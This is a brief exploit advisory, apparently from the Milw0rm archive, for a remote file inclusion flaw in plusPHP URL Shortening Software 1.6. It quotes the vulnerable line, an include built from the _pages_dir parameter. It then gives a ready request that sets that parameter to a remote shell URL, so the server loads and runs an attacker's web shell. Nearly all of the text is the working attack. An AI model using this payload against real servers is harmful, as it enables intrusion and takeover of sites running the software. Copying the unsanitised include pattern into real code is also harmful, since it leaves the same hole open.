plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
# Published : 2008-05-25
# Author : DR.TOXIC
# Previous Title : CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
# Next Title : Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit

Author: DR.TOXIC  / dr.toxic@windowslive.com
 
Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Script Download: http://www.hotscripts.com/jump.php?listing_id=80293&jump_type=1
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?
<--------------------Milw0rm Exploits-------------------->

# www.Syue.com [2008-05-25]